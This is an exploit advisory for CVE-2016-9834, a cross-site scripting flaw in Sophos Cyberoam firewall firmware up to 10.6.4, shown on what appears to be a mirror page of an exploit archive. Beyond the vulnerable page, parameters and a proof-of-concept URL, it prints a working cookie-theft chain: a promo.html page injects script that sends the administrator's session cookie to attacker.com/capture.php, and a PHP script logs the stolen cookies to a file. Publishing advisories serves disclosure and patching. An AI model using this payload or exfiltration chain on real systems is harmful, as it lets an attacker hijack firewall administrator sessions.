扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 |
# Exploit Title: Sophos Cyberoam – Cross-site scripting (XSS) vulnerability # Date: 25/05/2017 # Exploit Author: Bhadresh Patel # Version: <= Firmware Version 10.6.4 # CVE : CVE-2016-9834 This is an article with video tutorial for Sophos Cyberoam – Cross-site scripting (XSS) vulnerability -------------------------------------------------------------------------------------------------------------------------- Title: ==== Sophos Cyberoam – Cross-site scripting (XSS) vulnerability Credit: ====== Name: Bhadresh Patel Date: ==== 25/05/2017 (dd/mm/yyyy) Vendor: ====== More than 100 million users in 150 countries rely on Sophos to offer end-to-end protection against complex threats and data loss. Sophos is committed to providing complete, enterprise-grade security solutions that are simple to deploy, manage and use, and deliver one of the industry's lowest total cost of ownership. Sophos offers award-winning security solutions covering endpoint, mobile, server, encryption, web, email, Wi-Fi, and UTM/next-generation firewall, all backed by SophosLabs -- a global threat analysis center which provides real-time cloud-enabled security intelligence. Sophos is headquartered in Oxford, UK. Vulnerable Product: ============== Sophos Cyberoam Firewall Cyberoam Next-Generation Firewalls are based on CyberoamOS – an intelligent and powerful firmware that offers next-generation security features include inline application inspection and control, website filtering, HTTPS inspection, Intrusion Prevention System, VPN (IPSec and SSL) and QoS/bandwidth management. Additional security features like Web Application Firewall, Gateway Anti-Virus, Gateway Anti-Spam are also available. Customer Product link: https://www.cyberoam.com Abstract: ======= Cross-site scripting (XSS) vulnerability in Sophos Cyberoam firewall enables and attackers to execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc. Affected Software Version: ============= <= Firmware Version 10.6.4 Vendor Response ============= Sophos is committed to working with the security community in identifying, remediating and communicating security issues in our products. Customers are advised to upgrade their Cyberoam OS to v.10.6.5, which addresses this issue. Exploitation-Technique: =================== Remote Severity Rating (CVSS): =================== 6.9 (Medium) (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N) CVE ID: ======= CVE-2016-9834 Details: ======= This vulnerability allows remote attackers to execute arbitrary client side script in the active user’s browser session, when logged into the Cyberoam firewall. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of request to “LiveConnectionDetail.jsp” application. GET parameters “applicationname” and “username” are improperly sanitized allowing an attacker to inject arbitrary javascript into the page. This can be abused by an attacker to perform a cross-site scripting attack on the user. Vulnerable module/page/application: /corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp Vulnerable parameters: applicationname and username ======= *PoC* http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449 ";alert(document.cookie)//181&username=NA *PoC Video* https://www.youtube.com/watch?v=NmLPL2TYPcg *Real world scenario* 1) Victim (Admin) login to the Sophos Cyberoam web console 2) Sophos Cyberoam FW is on a latest version 3) record.txt is empty on attacker page 4) Victim (Admin) visits attacker URL/page http://www.attacker.com/promo.html 5) XSS successful and attacker captured cookie in record.txt -------------------------- Source code (promo.html) ---------------------------------- <html> <head> <script> window.location=" http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449\ ";document.location=' http://www.attacker.com/capture.php?content='.concat(escape(document.cookie));//181&username=NA " </script> </body> </html> -------------------------- Source code (capture.php) ---------------------------------- <?php file_put_contents('record.txt', $_GET['content']); echo "<HTML><body><script>window.location=\" http://192.168.30.30/corporate/webpages/index.jsp\"</script></body></HTML>" ?> Credits: ======= Bhadresh Patel -------------------------------------------------------------------------------------------------------------------------- |
体验盒子
